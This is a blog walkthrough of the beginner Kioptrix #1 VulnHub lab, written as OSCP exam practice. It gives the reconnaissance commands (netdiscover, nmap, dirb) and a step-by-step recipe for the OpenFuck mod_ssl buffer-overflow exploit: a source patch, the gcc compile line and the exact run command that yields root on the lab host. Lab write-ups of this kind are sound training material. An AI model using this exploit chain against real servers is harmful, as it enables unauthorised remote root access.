VulnHub Walkthrough – Kioptrix #1

Vulnhub link: kioptrix #1

I attempted (and succeeded) to root this box as part of my preparations for the OSCP exam. This was a very easy box to own (it is noted as ‘beginner’ for a reason)

netdiscover to find the target host:

netdiscover

In this case, our target is located at 192.168.174.129. Let’s run a standard nmap scan against it.

nmap -sS -sV -T4 -A -O -v -v -v -v 192.168.174.129

Nothing of interest to be found on the web server that is running on port 80/443. Running dirb against it reveals the directory /manual/ on the server. If we navigate here we can see two manuals for Apache mods. One of these mods is mod_ssl. Navigating to /manual/mod/mod_ssl/ reveals that the version of mod_ssl is 2.8.

mod_ssl

Searching exploit-db for Apache 1.3.20, we find a remote buffer overflow vulnerability affecting mod_ssl that allows us to run arbitrary code. Bingo.

Download an exploit of this vulnerability called OpenFuck from GitHub. Depending on whether or not it has been updated from the time of this post, you will have to make one small modification to the source code. In its current state, there is a typo on line 1087 of OpenFuck.c (broken if statement). Change it to so that it matches the following:

if (encrypted_key_length <= 0) {
     printf("send client master key: RSA encryption failure\n");
     exit(1);
}

You should now be able to successfully compile the exploit using gcc (make sure to link it with the crypto library using the -lcrypto option).

gcc -o OpenFuck OpenFuck.c -lcrypto

Running ./OpenFuck outputs a massive list of OS fingerprints. The two we are interested in are 0x6a and 0x6b for RedHat Linux 7.2 (apache-1.3.20-16)1 and 2. We will pass this parameter to OpenFuck so it knows what memory offset to use.

./OpenFuck 0x6b 192.168.174.129 443 -c 40

After a few seconds, we should have root access to the box.

rooted

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s